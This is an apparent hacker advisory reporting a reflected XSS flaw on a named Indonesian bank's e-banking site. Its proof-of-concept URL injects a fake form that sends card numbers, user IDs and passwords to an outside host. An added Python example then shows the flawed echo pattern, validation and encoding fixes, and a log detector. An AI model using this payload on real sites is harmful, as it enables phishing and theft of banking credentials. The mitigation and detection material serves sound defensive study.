Lippo Bank Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: ebanking.lippobank.co.id XSSED by SPYRO KiD}


PoC (reflected XSS via the atm_no parameter, which is echoed unencoded into the form):

https://ebanking.lippobank.co.id/Retail/ur_add2.jsp?atm_no=%22%3E%3C/form%3E%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsOdd%3E%3CTD%3E%3CFORM%20NAME=%22frmParam%22%20ACTION=%22http://spyrozone.black-it.net/index.php%22%20METHOD=%22POST%22%20AUTOCOMPLETE=%22OFF%22%3EATM%20Card%20Number%20(Confirm):%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22atm_no%22%20NAME=%22atm_no%22%20MAXLENGTH=%2216%22%20SIZE=%2216%22%20VALUE=%22%22%20%20%3E%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsEven%3E%3CTD%3EUser%20ID:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22user_id%22%20NAME=%22user_id%22%20MAXLENGTH=%229%22%20SIZE=%229%22%20VALUE=%22%22%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsOdd%3E%3CTD%3EUser%20Name:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22user_nm%22%20NAME=%22user_nm%22%20MAXLENGTH=%2250%22%20SIZE=%2250%22%20VALUE=%22%22%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsEven%3E%3CTD%3EPassword:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22PASSWORD%22%20ID=%22password%22%20NAME=%22password%22%20MAXLENGTH=%2212%22%20SIZE=%2212%22%20VALUE=%22%22%20%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsOdd%3E%3CTD%3EConfirm%20Password:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22PASSWORD%22%20ID=%22confirm_password%22%20NAME=%22confirm_password%22%20MAXLENGTH=%2212%22%20SIZE=%2212%22%20VALUE=%22%22%20%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsEven%3E%3CTD%3EE-mail:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22email%22%20NAME=%22email%22%20MAXLENGTH=%2240%22%20SIZE=%2240%22%20VALUE=%22%22%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=%22clsBtnBar%22%3E%3CTD%20COLSPAN=%222%22%20ALIGN=%22right%22%3E%3CINPUT%20TYPE=%22submit%22%20ID=%22Submit%22%20NAME=%22Submit%22%20VALUE=%22Submit%22%20onClick=%22Javascript:onSubmitClick()%22%3E%3CINPUT%20TYPE=%22button%22%20ID=%22Clear%22%20NAME=%22Clear%22%20VALUE=%22Clear%22%3E%3C/TD%3E%3C/TR%3E%3C/TABLE%3E%3C/FORM%3E%3Cscript%3E%3Cnoscript%3E
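The PoC works because the atm_no query value is written straight into the VALUE="" attribute of the card-number input; a leading `">` closes the attribute and the element, `</form>` closes the bank's own form, and the rest of the payload rebuilds a look-alike registration form whose ACTION points at an external host, so anything the visitor types is posted there. The example below is an added illustration, not code from the advisory or from the bank's site: it shows the echo-it-verbatim pattern beside the two server-side fixes (allow-list validation of the card number and HTML attribute encoding of the output), plus a small detector that flags request-log lines whose decoded parameters contain an attribute or tag break-out. The function names, the field markup and the two log lines are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the advisory): one benign
# request and one carrying a quote-and-close-tag payload of the PoC's shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Jul/2008:10:00:00 +0700] '
    '"GET /Retail/ur_add2.jsp?atm_no=1234567890123456 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Jul/2008:10:00:07 +0700] '
    '"GET /Retail/ur_add2.jsp?atm_no=%22%3E%3C/form%3E%3CFORM%20ACTION=%22http://example.invalid/%22%3E HTTP/1.1" 200 5301',
]

# The field is declared MAXLENGTH=16, so the allow-list is "exactly 16 digits".
ATM_NO_RE = re.compile(r"^[0-9]{16}$")


def validate_atm_no(value: str) -> bool:
    """Allow-list check: reject anything that is not a 16-digit card number."""
    return bool(ATM_NO_RE.match(value))


def render_atm_field_unsafe(atm_no: str) -> str:
    """The pattern the advisory describes: the parameter is echoed verbatim
    into an attribute, so a value containing '">' escapes the attribute."""
    return ('<INPUT TYPE="TEXT" ID="atm_no" NAME="atm_no" MAXLENGTH="16" SIZE="16" '
            f'VALUE="{atm_no}">')


def render_atm_field(atm_no: str) -> str:
    """Hardened rendering: html.escape(quote=True) turns " into &quot; and
    < > into &lt; &gt;, so the value can never terminate the attribute,
    the element or the enclosing form."""
    return ('<INPUT TYPE="TEXT" ID="atm_no" NAME="atm_no" MAXLENGTH="16" SIZE="16" '
            f'VALUE="{html.escape(atm_no, quote=True)}">')


# A closing quote followed by '>' or an opening/closing markup tag inside a
# parameter value is the signature of an attribute/tag break-out attempt.
BREAKOUT_RE = re.compile(r'"\s*>|</?(?:form|script|iframe|img)\b', re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flagged_params(log_line: str) -> dict:
    """Return {param: decoded_value} for query parameters in a log line whose
    decoded value matches BREAKOUT_RE; {} when nothing looks suspicious."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {}
    query = urlsplit(m.group(1)).query
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:
            decoded = unquote(v)  # parse_qs decoded once; catch double encoding too
            if BREAKOUT_RE.search(decoded):
                hits[name] = decoded
    return hits


if __name__ == "__main__":
    payload = '"></form><FORM ACTION="http://example.invalid/">'
    print("valid?", validate_atm_no(payload))
    print("unsafe:", render_atm_field_unsafe(payload))
    print("safe:  ", render_atm_field(payload))
    for line in SAMPLE_LOG:
        print("flagged:", flagged_params(line))
```

Validation and encoding are complementary: the allow-list stops the payload from ever reaching the template, and attribute encoding guarantees that a value which does reach it (through a different field, or a later code change) stays inert. The log detector is deliberately narrow; it is meant to be run over the parameters of the affected endpoint, where a legitimate card number never contains quotes or angle brackets.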


//E.O.F